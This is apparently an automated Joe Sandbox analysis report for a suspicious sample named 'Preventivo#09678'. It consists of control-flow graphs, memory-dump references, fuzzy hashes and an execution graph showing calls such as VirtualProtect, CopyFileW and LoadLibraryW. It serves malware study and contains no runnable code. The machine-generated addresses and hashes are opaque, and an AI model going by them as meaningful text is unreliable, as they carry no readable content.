                                                                                        control_flow_graph 1689 7ffaac639a80-7ffaac63e095 1691 7ffaac63e0df-7ffaac63e109 1689->1691 1692 7ffaac63e097-7ffaac63e0de 1689->1692 1694 7ffaac63e10b-7ffaac63e120 1691->1694 1695 7ffaac63e122 1691->1695 1692->1691 1697 7ffaac63e124-7ffaac63e129 1694->1697 1695->1697 1699 7ffaac63e12f-7ffaac63e13e 1697->1699 1700 7ffaac63e226-7ffaac63e246 1697->1700 1704 7ffaac63e140-7ffaac63e146 1699->1704 1705 7ffaac63e148-7ffaac63e149 1699->1705 1702 7ffaac63e297-7ffaac63e2a2 1700->1702 1706 7ffaac63e2a4-7ffaac63e2b3 1702->1706 1707 7ffaac63e248-7ffaac63e24e 1702->1707 1710 7ffaac63e14b-7ffaac63e16e 1704->1710 1705->1710 1713 7ffaac63e2b5-7ffaac63e2c7 1706->1713 1714 7ffaac63e2c9 1706->1714 1708 7ffaac63e254-7ffaac63e275 call 7ffaac639a60 1707->1708 1709 7ffaac63e712-7ffaac63e72a 1707->1709 1726 7ffaac63e27a-7ffaac63e294 1708->1726 1722 7ffaac63e72c-7ffaac63e767 call 7ffaac639568 1709->1722 1723 7ffaac63e774-7ffaac63e7a1 call 7ffaac635318 1709->1723 1717 7ffaac63e1c3-7ffaac63e1ce 1710->1717 1718 7ffaac63e2cb-7ffaac63e2d0 1713->1718 1714->1718 1719 7ffaac63e170-7ffaac63e176 1717->1719 1720 7ffaac63e1d0-7ffaac63e1e7 1717->1720 1724 7ffaac63e35c-7ffaac63e370 1718->1724 1725 7ffaac63e2d6-7ffaac63e2f8 call 7ffaac639a60 1718->1725 1719->1709 1727 7ffaac63e17c-7ffaac63e1c0 call 7ffaac639a60 1719->1727 1738 7ffaac63e1e9-7ffaac63e20f call 7ffaac639a60 1720->1738 1739 7ffaac63e216-7ffaac63e221 call 7ffaac639d58 1720->1739 1764 7ffaac63e7b1-7ffaac63e7bb 1722->1764 1765 7ffaac63e769-7ffaac63e772 1722->1765 1769 7ffaac63e7ac-7ffaac63e7af 1723->1769 1770 7ffaac63e7a3-7ffaac63e7ab 1723->1770 1729 7ffaac63e3c0-7ffaac63e3cf 1724->1729 1730 7ffaac63e372-7ffaac63e378 1724->1730 1759 7ffaac63e2fa-7ffaac63e324 1725->1759 1760 7ffaac63e326-7ffaac63e327 1725->1760 1726->1702 1727->1717 1754 7ffaac63e3dc 1729->1754 1755 7ffaac63e3d1-7ffaac63e3da 1729->1755 1735 7ffaac63e37a-7ffaac63e395 1730->1735 1736 7ffaac63e397-7ffaac63e3af 1730->1736 1735->1736 1752 7ffaac63e3b8-7ffaac63e3bb 1736->1752 1738->1739 1739->1724 1761 7ffaac63e568-7ffaac63e57d 1752->1761 1756 7ffaac63e3de-7ffaac63e3e3 1754->1756 1755->1756 1766 7ffaac63e6ef-7ffaac63e6f0 1756->1766 1767 7ffaac63e3e9-7ffaac63e3ec 1756->1767 1773 7ffaac63e329-7ffaac63e330 1759->1773 1760->1773 1781 7ffaac63e5bd 1761->1781 1782 7ffaac63e57f-7ffaac63e5bb 1761->1782 1778 7ffaac63e7bd-7ffaac63e7c5 1764->1778 1779 7ffaac63e7c6-7ffaac63e7d7 1764->1779 1765->1723 1774 7ffaac63e6f3-7ffaac63e702 1766->1774 1776 7ffaac63e3ee-7ffaac63e40b call 7ffaac630238 1767->1776 1777 7ffaac63e434 1767->1777 1769->1764 1770->1769 1773->1724 1775 7ffaac63e332-7ffaac63e357 call 7ffaac639a88 1773->1775 1791 7ffaac63e703-7ffaac63e70b 1774->1791 1805 7ffaac63e6de-7ffaac63e6ee 1775->1805 1776->1777 1818 7ffaac63e40d-7ffaac63e432 1776->1818 1789 7ffaac63e436-7ffaac63e43b 1777->1789 1778->1779 1787 7ffaac63e7e2-7ffaac63e82f call 7ffaac63bd40 1779->1787 1788 7ffaac63e7d9-7ffaac63e7e1 1779->1788 1785 7ffaac63e5bf-7ffaac63e5c4 1781->1785 1782->1785 1793 7ffaac63e634-7ffaac63e648 1785->1793 1794 7ffaac63e5c6-7ffaac63e5d1 1785->1794 1827 7ffaac63e841 1787->1827 1828 7ffaac63e831-7ffaac63e83f 1787->1828 1788->1787 1798 7ffaac63e53c-7ffaac63e55f 1789->1798 1799 7ffaac63e441-7ffaac63e44d 1789->1799 1791->1709 1800 7ffaac63e64a-7ffaac63e675 call 7ffaac635250 1793->1800 1801 7ffaac63e697-7ffaac63e6a3 call 7ffaac638610 1793->1801 1806 7ffaac63e5d3-7ffaac63e61d call 7ffaac635250 1794->1806 1815 7ffaac63e565-7ffaac63e566 1798->1815 1799->1709 1803 7ffaac63e453-7ffaac63e462 1799->1803 1826 7ffaac63e67a-7ffaac63e682 1800->1826 1819 7ffaac63e6a4-7ffaac63e6bc 1801->1819 1808 7ffaac63e475-7ffaac63e482 call 7ffaac630238 1803->1808 1809 7ffaac63e464-7ffaac63e473 1803->1809 1850 7ffaac63e68e-7ffaac63e693 1806->1850 1853 7ffaac63e61f-7ffaac63e623 1806->1853 1829 7ffaac63e488-7ffaac63e48e 1808->1829 1809->1829 1815->1761 1818->1789 1819->1709 1825 7ffaac63e6be-7ffaac63e6ce 1819->1825 1831 7ffaac63e6d0-7ffaac63e6db 1825->1831 1826->1774 1832 7ffaac63e684-7ffaac63e687 1826->1832 1833 7ffaac63e843-7ffaac63e848 1827->1833 1828->1833 1834 7ffaac63e490-7ffaac63e4bd 1829->1834 1835 7ffaac63e4c3-7ffaac63e4c8 1829->1835 1831->1805 1832->1791 1837 7ffaac63e689 1832->1837 1838 7ffaac63e84a-7ffaac63e85d call 7ffaac634250 1833->1838 1839 7ffaac63e85f-7ffaac63e865 1833->1839 1834->1835 1835->1709 1843 7ffaac63e4ce-7ffaac63e4ee 1835->1843 1837->1831 1846 7ffaac63e68b 1837->1846 1844 7ffaac63e86c-7ffaac63e873 1838->1844 1839->1844 1845 7ffaac63e867 call 7ffaac635268 1839->1845 1854 7ffaac63e4f0-7ffaac63e4ff 1843->1854 1855 7ffaac63e502-7ffaac63e508 1843->1855 1845->1844 1846->1850 1850->1801 1853->1819 1859 7ffaac63e625-7ffaac63e62e 1853->1859 1854->1855 1857 7ffaac63e51a-7ffaac63e532 call 7ffaac639ae0 1855->1857 1858 7ffaac63e50a-7ffaac63e519 1855->1858 1862 7ffaac63e537-7ffaac63e53a 1857->1862 1858->1857 1859->1793 1859->1806 1862->1761
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4a4db46713728c05ed506940305faa0a1fa85573277461b7f76a6078a1eda668
                                                                                        • Instruction ID: 37f4a7e2d4a59005178d7ee4d9c0adad93997fff8b46bb2f8c4dbbb8c2ba24eb
                                                                                        • Opcode Fuzzy Hash: 4a4db46713728c05ed506940305faa0a1fa85573277461b7f76a6078a1eda668
                                                                                        • Instruction Fuzzy Hash: 17522730A0DA498FEB69DB28C855A7977E1FF5A300F1051BDE05EC7292DE24EC46C791

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2473 7ffaac63c880-7ffaac63c89e 2475 7ffaac63c8a0-7ffaac63c8a5 2473->2475 2476 7ffaac63c90f-7ffaac63c91c 2473->2476 2477 7ffaac63c8a7-7ffaac63c8c8 call 7ffaac6389b0 2475->2477 2478 7ffaac63c926-7ffaac63c93c 2475->2478 2479 7ffaac63c91e-7ffaac63c925 2476->2479 2480 7ffaac63c966-7ffaac63c9a3 call 7ffaac63bd40 * 2 call 7ffaac638610 2476->2480 2487 7ffaac63c8ea-7ffaac63c8fb 2477->2487 2488 7ffaac63c8ca-7ffaac63c8e9 2477->2488 2483 7ffaac63c93d-7ffaac63c949 2478->2483 2479->2478 2491 7ffaac63cb7c-7ffaac63cb8f 2480->2491 2498 7ffaac63c9a9-7ffaac63c9c4 2480->2498 2483->2491 2492 7ffaac63c94f-7ffaac63c965 2483->2492 2487->2483 2497 7ffaac63c8fd-7ffaac63c90d 2487->2497 2499 7ffaac63cbd1-7ffaac63cbdc 2491->2499 2500 7ffaac63cb91-7ffaac63cbbb 2491->2500 2492->2480 2497->2476 2501 7ffaac63ca1d-7ffaac63ca27 2498->2501 2502 7ffaac63c9c6-7ffaac63c9c9 2498->2502 2504 7ffaac63cbed-7ffaac63cc0c 2499->2504 2505 7ffaac63cbde-7ffaac63cbea 2499->2505 2510 7ffaac63cbbd-7ffaac63cbc6 2500->2510 2511 7ffaac63cbc9-7ffaac63cbcf 2500->2511 2512 7ffaac63ca9f-7ffaac63caa7 2501->2512 2508 7ffaac63c9cb-7ffaac63c9eb 2502->2508 2509 7ffaac63ca4a-7ffaac63ca4b 2502->2509 2506 7ffaac63cc1d-7ffaac63cc36 2504->2506 2507 7ffaac63cc0e-7ffaac63cc1a 2504->2507 2505->2504 2513 7ffaac63cc38-7ffaac63cc43 2506->2513 2514 7ffaac63cc46-7ffaac63cc5b 2506->2514 2507->2506 2521 7ffaac63c9ed-7ffaac63c9fe 2508->2521 2522 7ffaac63ca29-7ffaac63ca3a 2508->2522 2515 7ffaac63ca4c-7ffaac63ca5a 2509->2515 2510->2511 2511->2499 2517 7ffaac63caa9-7ffaac63caae 2512->2517 2518 7ffaac63cb18-7ffaac63cb2b 2512->2518 2513->2514 2515->2517 2526 7ffaac63ca5d-7ffaac63ca84 2515->2526 2519 7ffaac63cb2f-7ffaac63cb3b call 7ffaac634590 2517->2519 2523 7ffaac63cab0-7ffaac63caf4 call 7ffaac6389b0 2517->2523 2518->2519 2531 7ffaac63cb40-7ffaac63cb50 2519->2531 2521->2515 2533 7ffaac63ca00-7ffaac63ca1c 2521->2533 2529 7ffaac63ca3c-7ffaac63ca48 2522->2529 2530 7ffaac63ca88-7ffaac63ca9b 2522->2530 2523->2491 2538 7ffaac63cafa-7ffaac63cb17 2523->2538 2526->2512 2529->2509 2535 7ffaac63ca86-7ffaac63ca87 2529->2535 2530->2512 2531->2491 2536 7ffaac63cb52-7ffaac63cb7b 2531->2536 2533->2501 2535->2530 2538->2518
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f56ea2710a80c50c0366e3da5060369b1eae73488d2f16a60a777eb42d6716fe
                                                                                        • Instruction ID: ae2311b75941fdd043c8462ded6c74952cbc535a6a102ff403687faa2ec23d60
                                                                                        • Opcode Fuzzy Hash: f56ea2710a80c50c0366e3da5060369b1eae73488d2f16a60a777eb42d6716fe
                                                                                        • Instruction Fuzzy Hash: 37D15771A1DB868FE31ACB2884551B5B7D2EFD6301B14967EE4CAC3395DE28E40AC7C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cddc8b98462acb3a8758e7788626b58598359f6619f4c7fc116e0ae87735e0e0
                                                                                        • Instruction ID: 6c51cdf07a21c050b0ebc0b7a7103efa275cdab43bc93c4b75abb49b13e8095a
                                                                                        • Opcode Fuzzy Hash: cddc8b98462acb3a8758e7788626b58598359f6619f4c7fc116e0ae87735e0e0
                                                                                        • Instruction Fuzzy Hash: 33B11571D0865D8FDB99DFA8C894BADBBB1FF59301F1051AAD00DE7292CB34A985CB40

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 777 7ffaac633f36-7ffaac633f5f 778 7ffaac633f6a-7ffaac634089 VirtualProtect 777->778 779 7ffaac633f61-7ffaac633f69 777->779 783 7ffaac63408b 778->783 784 7ffaac634091-7ffaac6340eb 778->784 779->778 783->784
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: dae7569ccac5c899f348b28ad38623c9780ae0ae62e828fa4a4e750f6b29a1ba
                                                                                        • Instruction ID: 2b4cf1f7e9873b8bdc2b0490e2d5e3ba3b5b240caf141dbd55d88626ba2a196a
                                                                                        • Opcode Fuzzy Hash: dae7569ccac5c899f348b28ad38623c9780ae0ae62e828fa4a4e750f6b29a1ba
                                                                                        • Instruction Fuzzy Hash: 7B518F74D0864D8FDB55DF68C885BEDBBF1FB56310F1042AAD049E7252DB74A885CB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1538050731.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac710000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea78d5ede6fe4056e2853b552a91d7b551746e23444a0d4e037c6123104ece07
                                                                                        • Instruction ID: 19de0e90a9ef8c968baa7381c95102307cca548a1fef9c7cb9cfdb22f42c2020
                                                                                        • Opcode Fuzzy Hash: ea78d5ede6fe4056e2853b552a91d7b551746e23444a0d4e037c6123104ece07
                                                                                        • Instruction Fuzzy Hash: 1441393190DBC98FEB46DF18C8555A87FB1FF56340B1981EAD04ECB1A6EA25E849C3C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8860f470cf9a2c0d0e32ad16374528f48e6bdc1f7f0a9b126638ecbb56ccd0a9
                                                                                        • Instruction ID: 27c0766a350473276e4247580f0f925c2033a26a3a8b7de3b618e25bab759b53
                                                                                        • Opcode Fuzzy Hash: 8860f470cf9a2c0d0e32ad16374528f48e6bdc1f7f0a9b126638ecbb56ccd0a9
                                                                                        • Instruction Fuzzy Hash: A9819570908A8D8FEBA9DF18C845BE97BE1FF5A310F00917AD84DC7292DA74D945CB81

                                                                                        Execution Graph

                                                                                        Execution Coverage:11.7%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:242
                                                                                        Total number of Limit Nodes:14
                                                                                        execution_graph 41159 15e0848 41160 15e0856 41159->41160 41163 15e1251 41160->41163 41164 15e128b 41163->41164 41165 15e13c2 41164->41165 41173 15e1862 41164->41173 41177 15e1870 41164->41177 41167 15e145c 41165->41167 41170 15e1862 KiUserExceptionDispatcher 41165->41170 41171 15e1870 KiUserExceptionDispatcher 41165->41171 41166 15e1432 41166->41167 41181 69be961 41166->41181 41170->41166 41171->41166 41175 15e1893 41173->41175 41174 15e1897 41174->41164 41175->41174 41176 15e18ba KiUserExceptionDispatcher 41175->41176 41176->41174 41179 15e1893 41177->41179 41178 15e1897 41178->41164 41179->41178 41180 15e18ba KiUserExceptionDispatcher 41179->41180 41180->41178 41182 69be983 41181->41182 41183 69be977 41181->41183 41182->41167 41189 69beed8 41183->41189 41200 69be9a0 41183->41200 41211 69be992 41183->41211 41222 69bed03 41183->41222 41233 69bed0c 41183->41233 41191 69be9f3 41189->41191 41190 69beefc 41190->41190 41191->41190 41194 69bf1ce CopyFileW CopyFileW 41191->41194 41195 69bf15d CopyFileW CopyFileW 41191->41195 41196 69bf212 CopyFileW CopyFileW 41191->41196 41197 69bef50 CopyFileW CopyFileW 41191->41197 41198 69bef40 CopyFileW CopyFileW 41191->41198 41199 69bf1c5 CopyFileW CopyFileW 41191->41199 41244 69bf248 41191->41244 41260 69bf2ee 41191->41260 41194->41191 41195->41191 41196->41191 41197->41191 41198->41191 41199->41191 41202 69be9c5 41200->41202 41201 69beefc 41201->41201 41202->41201 41203 69bf248 2 API calls 41202->41203 41204 69bf2ee 2 API calls 41202->41204 41205 69bf1ce CopyFileW CopyFileW 41202->41205 41206 69bf15d CopyFileW CopyFileW 41202->41206 41207 69bf212 CopyFileW CopyFileW 41202->41207 41208 69bef50 CopyFileW CopyFileW 41202->41208 41209 69bef40 CopyFileW CopyFileW 41202->41209 41210 69bf1c5 CopyFileW CopyFileW 41202->41210 41203->41202 41204->41202 41205->41202 41206->41202 41207->41202 41208->41202 41209->41202 41210->41202 41213 69be99d 41211->41213 41212 69beefc 41213->41212 41214 69bf248 2 API calls 41213->41214 41215 69bf2ee 2 API calls 41213->41215 41216 69bf1ce CopyFileW CopyFileW 41213->41216 41217 69bf15d CopyFileW CopyFileW 41213->41217 41218 69bf212 CopyFileW CopyFileW 41213->41218 41219 69bef50 CopyFileW CopyFileW 41213->41219 41220 69bef40 CopyFileW CopyFileW 41213->41220 41221 69bf1c5 CopyFileW CopyFileW 41213->41221 41214->41213 41215->41213 41216->41213 41217->41213 41218->41213 41219->41213 41220->41213 41221->41213 41224 69be9f3 41222->41224 41223 69beefc 41224->41222 41224->41223 41225 69bf248 2 API calls 41224->41225 41226 69bf2ee 2 API calls 41224->41226 41227 69bf1ce CopyFileW CopyFileW 41224->41227 41228 69bf15d CopyFileW CopyFileW 41224->41228 41229 69bf212 CopyFileW CopyFileW 41224->41229 41230 69bef50 CopyFileW CopyFileW 41224->41230 41231 69bef40 CopyFileW CopyFileW 41224->41231 41232 69bf1c5 CopyFileW CopyFileW 41224->41232 41225->41224 41226->41224 41227->41224 41228->41224 41229->41224 41230->41224 41231->41224 41232->41224 41235 69be9f3 41233->41235 41234 69beefc 41234->41234 41235->41234 41236 69bf248 2 API calls 41235->41236 41237 69bf2ee 2 API calls 41235->41237 41238 69bf1ce CopyFileW CopyFileW 41235->41238 41239 69bf15d CopyFileW CopyFileW 41235->41239 41240 69bf212 CopyFileW CopyFileW 41235->41240 41241 69bef50 CopyFileW CopyFileW 41235->41241 41242 69bef40 CopyFileW CopyFileW 41235->41242 41243 69bf1c5 CopyFileW CopyFileW 41235->41243 41236->41235 41237->41235 41238->41235 41239->41235 41240->41235 41241->41235 41242->41235 41243->41235 41245 69bf26f 41244->41245 41248 69bf248 2 API calls 41245->41248 41249 69bf2ee 2 API calls 41245->41249 41266 69bf15d 41245->41266 41283 69bf300 41245->41283 41289 69bf1c5 41245->41289 41306 69bf212 41245->41306 41323 69bef40 41245->41323 41340 69bef50 41245->41340 41357 69bf1ce 41245->41357 41246 69bf2a3 41374 69bf398 41246->41374 41377 69bf388 41246->41377 41381 69bf3d0 41246->41381 41247 69bf340 41247->41191 41248->41246 41249->41246 41261 69bf2b1 41260->41261 41261->41260 41263 69bf398 CopyFileW 41261->41263 41264 69bf388 CopyFileW 41261->41264 41265 69bf3d0 2 API calls 41261->41265 41262 69bf340 41262->41191 41263->41262 41264->41262 41265->41262 41268 69bf09e 41266->41268 41267 69bf225 41267->41246 41268->41267 41271 69bf248 2 API calls 41268->41271 41272 69bf2ee 2 API calls 41268->41272 41273 69bf1ce 2 API calls 41268->41273 41274 69bf15d 2 API calls 41268->41274 41275 69bf212 2 API calls 41268->41275 41276 69bef50 2 API calls 41268->41276 41277 69bef40 2 API calls 41268->41277 41278 69bf300 2 API calls 41268->41278 41279 69bf1c5 2 API calls 41268->41279 41269 69bf2a3 41280 69bf398 CopyFileW 41269->41280 41281 69bf388 CopyFileW 41269->41281 41282 69bf3d0 2 API calls 41269->41282 41270 69bf340 41270->41246 41271->41269 41272->41269 41273->41269 41274->41269 41275->41269 41276->41269 41277->41269 41278->41269 41279->41269 41280->41270 41281->41270 41282->41270 41284 69bf31e 41283->41284 41286 69bf398 CopyFileW 41284->41286 41287 69bf388 CopyFileW 41284->41287 41288 69bf3d0 2 API calls 41284->41288 41285 69bf340 41285->41246 41286->41285 41287->41285 41288->41285 41291 69bf1d3 41289->41291 41290 69bf225 41290->41246 41291->41290 41294 69bf248 2 API calls 41291->41294 41295 69bf2ee 2 API calls 41291->41295 41296 69bf1ce 2 API calls 41291->41296 41297 69bf15d 2 API calls 41291->41297 41298 69bf212 2 API calls 41291->41298 41299 69bef50 2 API calls 41291->41299 41300 69bef40 2 API calls 41291->41300 41301 69bf300 2 API calls 41291->41301 41302 69bf1c5 2 API calls 41291->41302 41292 69bf2a3 41303 69bf398 CopyFileW 41292->41303 41304 69bf388 CopyFileW 41292->41304 41305 69bf3d0 2 API calls 41292->41305 41293 69bf340 41293->41246 41294->41292 41295->41292 41296->41292 41297->41292 41298->41292 41299->41292 41300->41292 41301->41292 41302->41292 41303->41293 41304->41293 41305->41293 41308 69bf1e7 41306->41308 41307 69bf225 41307->41246 41308->41307 41311 69bf248 2 API calls 41308->41311 41312 69bf2ee 2 API calls 41308->41312 41313 69bf1ce 2 API calls 41308->41313 41314 69bf15d 2 API calls 41308->41314 41315 69bf212 2 API calls 41308->41315 41316 69bef50 2 API calls 41308->41316 41317 69bef40 2 API calls 41308->41317 41318 69bf300 2 API calls 41308->41318 41319 69bf1c5 2 API calls 41308->41319 41309 69bf2a3 41320 69bf398 CopyFileW 41309->41320 41321 69bf388 CopyFileW 41309->41321 41322 69bf3d0 2 API calls 41309->41322 41310 69bf340 41310->41246 41311->41309 41312->41309 41313->41309 41314->41309 41315->41309 41316->41309 41317->41309 41318->41309 41319->41309 41320->41310 41321->41310 41322->41310 41326 69bef49 41323->41326 41324 69bf225 41324->41246 41325 69bf2a3 41328 69bf398 CopyFileW 41325->41328 41329 69bf388 CopyFileW 41325->41329 41330 69bf3d0 2 API calls 41325->41330 41326->41324 41331 69bf248 2 API calls 41326->41331 41332 69bf2ee 2 API calls 41326->41332 41333 69bf1ce 2 API calls 41326->41333 41334 69bf15d 2 API calls 41326->41334 41335 69bf212 2 API calls 41326->41335 41336 69bef50 2 API calls 41326->41336 41337 69bef40 2 API calls 41326->41337 41338 69bf300 2 API calls 41326->41338 41339 69bf1c5 2 API calls 41326->41339 41327 69bf340 41327->41246 41328->41327 41329->41327 41330->41327 41331->41325 41332->41325 41333->41325 41334->41325 41335->41325 41336->41325 41337->41325 41338->41325 41339->41325 41342 69bef79 41340->41342 41341 69bf225 41341->41246 41342->41341 41348 69bf248 2 API calls 41342->41348 41349 69bf2ee 2 API calls 41342->41349 41350 69bf1ce 2 API calls 41342->41350 41351 69bf15d 2 API calls 41342->41351 41352 69bf212 2 API calls 41342->41352 41353 69bef50 2 API calls 41342->41353 41354 69bef40 2 API calls 41342->41354 41355 69bf300 2 API calls 41342->41355 41356 69bf1c5 2 API calls 41342->41356 41343 69bf2a3 41345 69bf398 CopyFileW 41343->41345 41346 69bf388 CopyFileW 41343->41346 41347 69bf3d0 2 API calls 41343->41347 41344 69bf340 41344->41246 41345->41344 41346->41344 41347->41344 41348->41343 41349->41343 41350->41343 41351->41343 41352->41343 41353->41343 41354->41343 41355->41343 41356->41343 41359 69bf1d3 41357->41359 41358 69bf225 41358->41246 41359->41358 41362 69bf248 2 API calls 41359->41362 41363 69bf2ee 2 API calls 41359->41363 41364 69bf1ce 2 API calls 41359->41364 41365 69bf15d 2 API calls 41359->41365 41366 69bf212 2 API calls 41359->41366 41367 69bef50 2 API calls 41359->41367 41368 69bef40 2 API calls 41359->41368 41369 69bf300 2 API calls 41359->41369 41370 69bf1c5 2 API calls 41359->41370 41360 69bf2a3 41371 69bf398 CopyFileW 41360->41371 41372 69bf388 CopyFileW 41360->41372 41373 69bf3d0 2 API calls 41360->41373 41361 69bf340 41361->41246 41362->41360 41363->41360 41364->41360 41365->41360 41366->41360 41367->41360 41368->41360 41369->41360 41370->41360 41371->41361 41372->41361 41373->41361 41389 69bc40c 41374->41389 41378 69bf398 41377->41378 41379 69bc40c CopyFileW 41378->41379 41380 69bf3b4 41379->41380 41382 69bf389 41381->41382 41384 69bf3d3 CopyFileW 41381->41384 41383 69bf341 41382->41383 41385 69bc40c CopyFileW 41382->41385 41383->41247 41388 69bf480 41384->41388 41386 69bf3b4 41385->41386 41388->41247 41390 69bf3d8 CopyFileW 41389->41390 41392 69bf3b4 41390->41392 41393 69b6401 41394 69b639c 41393->41394 41396 69b640a 41393->41396 41400 69b7438 41394->41400 41404 69b74a0 41394->41404 41408 69b7491 41394->41408 41395 69b63bd 41401 69b742d 41400->41401 41401->41400 41402 69b74f1 41401->41402 41412 69b7038 41401->41412 41402->41395 41405 69b74e8 41404->41405 41406 69b74f1 41405->41406 41407 69b7038 LoadLibraryW 41405->41407 41406->41395 41407->41406 41409 69b742d 41408->41409 41409->41408 41410 69b74f1 41409->41410 41411 69b7038 LoadLibraryW 41409->41411 41410->41395 41411->41410 41413 69b7690 LoadLibraryW 41412->41413 41415 69b7705 41413->41415 41415->41402 41416 15e0871 41420 15e08d8 41416->41420 41425 15e08c8 41416->41425 41417 15e0889 41421 15e08fa 41420->41421 41430 15e0ce8 41421->41430 41434 15e0ce0 41421->41434 41424 15e093e 41424->41417 41426 15e08fa 41425->41426 41427 15e0ce8 GetConsoleWindow 41426->41427 41428 15e0ce0 GetConsoleWindow 41426->41428 41429 15e093e 41427->41429 41428->41429 41429->41417 41431 15e0d26 GetConsoleWindow 41430->41431 41433 15e0d56 41431->41433 41433->41424 41435 15e0d26 GetConsoleWindow 41434->41435 41437 15e0d56 41435->41437 41437->41424
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 426396fddf230e8c1e60a74bfab77f6b56f9eae67112ec1947788b89eee0c7e1
                                                                                        • Instruction ID: 5a9fb879e72798934c8d8a21c51c45542ac953969328824315c2caee8ee65567
                                                                                        • Opcode Fuzzy Hash: 426396fddf230e8c1e60a74bfab77f6b56f9eae67112ec1947788b89eee0c7e1
                                                                                        • Instruction Fuzzy Hash: 7A425BB5A10205DFEB15CF68D584AAEBBF2FF88310F158599E409AB361D730ED45CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 03811e203bca455d93fcca2dacc538e329f57717f7d8dee89744fcee6aa45109
                                                                                        • Instruction ID: cd4814f6331fd3d8584c2601459f41cdc8407fc9cf31d8d8b17d3b3ad3fcee70
                                                                                        • Opcode Fuzzy Hash: 03811e203bca455d93fcca2dacc538e329f57717f7d8dee89744fcee6aa45109
                                                                                        • Instruction Fuzzy Hash: 39F14CB5B00206CFDB04DF69D4849ADBBF6BF89310B1585A9E91ADB361DB30EC41CB50

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1386 69bf3d0-69bf3d1 1387 69bf389 1386->1387 1388 69bf3d3-69bf42a 1386->1388 1390 69bf38b-69bf3af call 69bc40c 1387->1390 1391 69bf341-69bf384 1387->1391 1397 69bf42c-69bf432 1388->1397 1398 69bf435-69bf439 1388->1398 1396 69bf3b4-69bf3bf 1390->1396 1397->1398 1400 69bf43b-69bf43e 1398->1400 1401 69bf441-69bf47e CopyFileW 1398->1401 1400->1401 1402 69bf480-69bf486 1401->1402 1403 69bf487-69bf4af 1401->1403 1402->1403
                                                                                        APIs
                                                                                        • CopyFileW.KERNEL32(?,00000000,?), ref: 069BF471
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439545783.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_69b0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID: CopyFile
                                                                                        • String ID:
                                                                                        • API String ID: 1304948518-0
                                                                                        • Opcode ID: ef05115cf91a6beb13c2cdbb431459818e6d3a84aa5aa75d51650902390465e4
                                                                                        • Instruction ID: a52e3a860c467838451fb54e67a3975bf44090f18203459435a48f931e256ddd
                                                                                        • Opcode Fuzzy Hash: ef05115cf91a6beb13c2cdbb431459818e6d3a84aa5aa75d51650902390465e4
